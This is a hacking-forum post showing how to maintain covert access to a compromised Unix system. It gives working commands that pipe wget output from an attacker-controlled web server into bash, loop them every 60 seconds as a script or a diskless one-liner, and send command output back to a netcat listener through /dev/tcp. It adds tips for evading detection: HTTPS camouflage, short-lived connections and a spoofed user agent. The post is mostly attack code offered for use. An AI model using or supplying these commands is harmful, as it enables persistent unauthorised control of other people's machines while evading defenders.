Using Wget for Maintaining Access to a System
#1
This is a little trick I picked up recently. Can't remember where I got it, but I'm going to show you how it works. Below is the bash command using wget. For those who don't know, wget is a file download utility preinstalled on most Unix-like systems.

Code:
wget -q -O - http://example.com | bash

So basically what's going on is wget downloads the file with no output (-q flag) and instead of writing to a file like normal it pipes the output of the command to bash. The command on the web page is then executed. http://example.com would be a HTTP server you control. You could host a simple text file on with bash commands. For example, to make a "command page" for the shell all you have to do is (on Unix systems) enter: "touch command.txt". Then put whatever command you want in the file. To list directory contents on the compromised system execute this command on your system: "echo "ls" > command.txt"
 So that's all well and great. But it only allows one command to be executed at a time. Let's make a little bash script.

Code:
for i in {1..9999}
do

wget -q -O - http://example.com | bash
sleep 60
done

Save as a bash script (something.sh) and then execute it on target. It basically just executes whatever is on the control web page every 60 seconds. We can shorten this to a one liner if you would rather not write the script to the target disk.

Code:
for i in {1..9999}; do wget -q -O - http://example.com | bash; sleep 60; done

You can't really see any of the output of your commands. The solution is to redirect output back to your machine. You'll need to have a netcat listener running to get the output:

Code:
wget -q -O - http://127.0.0.1:8080/cmd | bash &> /dev/tcp/127.0.0.1/31337

This is better than your average TCP reverse shell. The reasons being, 1: HTTP(S) is less suspicious on a network than straight up TCP. And yes, if your site runs HTTPS then the shell communications will also be encrypted. Reason 2: The connection only remains open as long as wget tries to connect back, which isn't long. The "sleep" time is obviously up to you, so it can connect back more or less often. So if you run netstat, you may or may not actually see it. If you do happen to catch it, it looks like a HTTP(S) connection. Under closer scrutiny on the network side, this shell will have a wget user agent. Just add your own with the wget -U flag.

That's all for today boys and girls. Hope you enjoyed and thanks for reading.

- ghost_eyes
https://github.com/ghostwalkr
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  want to do this kind of MITM attack without using wireshark QMark 2 3,582 02-06-2019, 07:17 PM
Last Post: Insider
  New attack on WPA/WPA2 using PMKID (Hashcat) Insider 1 6,482 08-14-2018, 10:54 PM
Last Post: overfl0wN
  How to practice Wireless networking using just a laptop? QMark 10 9,797 02-23-2018, 10:25 PM
Last Post: QMark
  Port 22 - should we really be using port 22 for SSH? D/L 15 10,733 05-28-2017, 06:20 PM
Last Post: Hysteresis